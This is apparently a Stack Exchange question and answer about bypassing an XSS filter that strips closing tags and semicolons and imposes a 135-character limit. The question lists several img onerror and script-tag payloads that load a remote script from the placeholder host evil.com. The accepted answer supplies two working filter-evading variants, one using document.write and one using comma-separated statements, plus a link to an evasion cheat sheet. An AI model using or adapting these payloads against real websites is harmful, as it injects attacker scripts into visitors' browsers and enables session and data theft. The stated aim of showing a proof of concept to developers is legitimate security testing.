# How to abuse XSS with specific criteria or filters?

Tags: javascript, xss, client-side-attacks

I have found a web app that is vulnerable to XSS, and can get some javascript running using an `img` tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.

The filters I have detected so far are as follows:

- `</anythingyouwant>` gets replaced with nothing
- `/>` gets replaced with nothing
- `;` gets replaced with a space until the next `>`
- 135 character limit including method of delivery ex `<img src="." onerror="alert('xss')">`

Injecting `<img src="." onerror="alert('xss')">` works fine, however these developers are rather sceptical and wish to see a full PoC of full javascript code. Is it possible to run an arbitrary script at all?

I have tried:

- `<img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))">` result: too long, even with a shortened URL
- `<script src="//evil.com/myscript" />` result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag
- `<script src=//evil.com/myscript"></script>` result: gets filtered, destroys rest of page as above
- `<img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">` result: semicolons get filtered, breaks web page
- `<img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)">` result: im unsure if this is valid js, but it appears in the chrome `view page source` as intended, but does not work as wanted

I am using chrome for testing, just in case it's relevant somehow.

Comment: Use commas instead of semicolons.

Comment: "*destroys rest of page*" - how is that a problem? As long as your code runs, you can do anything you like, including an attempt at restoring the rest of the page so that the user doesn't notice.

Comment: @Bergi the original page is a mess and is dynamic, by "destroyed" I mean the rest of the page gets removed completely, and it would be too much code to recreate quickly.

Answer (score 1, accepted):

The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:

```
<img src="." onerror="document.write('<script src=\'//evil.com/myscript\'><'+'/'+'script>')">
```

or your version with a `,` instead of a `;`:

```
<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">
```

But I am absolutely certain there are many other ways to do that. You could also check the following [cheat sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) which I found in [this answer](https://stackoverflow.com/questions/20171180/how-to-inject-javascript-without-using-script-tags).